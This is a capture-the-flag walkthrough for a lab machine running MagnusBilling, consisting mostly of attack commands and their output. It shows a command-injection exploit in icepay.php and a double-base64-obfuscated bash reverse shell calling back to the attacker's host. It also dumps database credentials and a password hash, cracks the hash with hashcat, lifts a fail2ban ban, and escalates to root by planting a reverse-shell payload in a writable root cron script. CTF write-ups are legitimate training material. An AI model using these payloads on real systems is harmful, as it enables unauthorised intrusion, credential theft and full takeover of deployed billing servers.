sudo nmap -sC -sV -p- 10.XX.XX.XX
TCP
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/mbilling/
| http-title: MagnusBilling
|_Requested resource was http://10.XX.XX.XX/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
3306/tcp open mysql MariaDB (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 2.10.6
sudo nmap -sU 10.XX.XX.XX
UDP
123/udp open ntp
Commit : Vulnerability in icepay.php
if (isset($_GET['demo'])) {
if ($_GET['demo'] == 1) {
exec("touch idepay_proccess.php");
} else {
exec("rm -rf idepay_proccess.php");
}
}
if (isset($_GET['democ'])) {
if (strlen($_GET['democ']) > 5) {
exec("touch " . $_GET['democ'] . '.txt');
} else {
exec("rm -rf *.txt");
}
}
POC
curl 'http://10.XX.XX.XX/mbilling/lib/icepay/icepay.php?democ=null;PAYLOAD;null'
PAYLOAD
echo 'bash -i >& /dev/tcp/10.11.XX.XX/7777 0>&1' | base64 | base64
echo%20"WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNUzVZV0M1WVdDODNOemMzSURBK0pqRUsK"|base64%20-d|base64%20-d|bash
curl 'http://10.XX.XX.XX/mbilling/lib/icepay/icepay.php?democ=null;echo%20"WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNUzVZV0M1WVdDODNOemMzSURBK0pqRUsK"|base64%20-d|base64%20-d|bash;null'
- Listening on kali.
┌──(kali㉿kali)-[~]
nc -lvnp 7777
...
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ whoami
asterisk
- Stabilization of our shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
- If we follow the track of the cron task, we should find interesting things.
┌── asterisk@Billing:/$
cat /etc/crontab
* * * * * root php /var/www/html/mbilling/cron.php cryptocurrency
* * * * * root php /home/magnus/install/check.php
- Let’s check what cron.php contains.
┌── asterisk@Billing:/$
cat /var/www/html/mbilling/cron.php
// Definicao do framework e do arquivo de config da aplicacao
$yii = dirname(__FILE__) . '/yii/framework/yii.php';
$config = dirname(__FILE__) . '/protected/config/cron.php';
- Let’s check what cron.php in the protected folder contains.
┌── asterisk@Billing:/$
cat /var/www/html/mbilling/protected/config/cron.php
- This one refers to res_config_mysql.conf, let’s see more in this file.
$configFile = '/etc/asterisk/res_config_mysql.conf';
- Ok, we found credentials to log into the database.
┌── asterisk@Billing:/$
cat /etc/asterisk/res_config_mysql.conf
[general]
dbhost = 127.0.0.1
dbname = mbilling
dbuser = mbillingUser
dbpass = XXXXXXXXXXXXXXXXX
mysql -h localhost -u mbillingUser -p
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mbilling |
+--------------------+
use mbilling;
show tables;
| pkg_user |
| pkg_user_history |
| pkg_user_rate |
| pkg_user_type |
| pkg_voicemail_users |
| pkg_voucher |
+-----------------------------+
- The pkg_user table contains the user root password of the application (sha-1).
select * from pkg_user;
root | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- We will have to crack the password with hashcat.
┌──(kali㉿kali)-[~]
hashcat -m 100 hash.txt /home/kali/rockyou.txt
- Ok, we find a match !
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:PASSWD
-
Now we can check if magnus used his password to set up the application root account.
-
The su function does not seem to work, we will have to try to connect in ssh.
┌──(kali㉿kali)-[~]
ssh magnus@10.XX.XX.XX
- If the attacker brute-forced the magnus password, his ip will be banned but asterisk has the power to remove his ban.
ssh: connect to host 10.XX.XX.XX port 22: Connection refused
┌── asterisk@Billing:/$
sudo /usr/bin/fail2ban-client status sshd
- Actions
|- Currently banned: 1
|- Total banned: 1
`- Banned IP list: 10.11.XX.XX
┌── asterisk@Billing:/$
sudo /usr/bin/fail2ban-client unbanip 10.11.XX.XX
┌──(kali㉿kali)-[~]
ssh magnus@10.XX.XX.XX
- We can now display the contents of /home/magnus/user.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
┌── magnus@Billing:/$
cat /etc/crontab
* * * * * root php /var/www/html/mbilling/cron.php cryptocurrency
* * * * * root php /home/magnus/install/check.php
-
A misconfiguration of the second cron job launches a php script as root that is writable by magnus.
-
Just place a payload in the check.php script and listen on kali.
┌──(kali㉿kali)-[~]
nc -lvnp 7777
PAYLOAD /home/magnus/install/check.php
<?php
exec('echo "WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNUzVZV0M1WVdDODNOemMzSURBK0pqRUsK"|base64 -d|base64 -d|bash')
?>
┌──(kali㉿kali)-[~]
nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.11.XX.XX] from (UNKNOWN) [10.XX.XX.XX]
root@Billing:~# whoami
root
/root/root.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}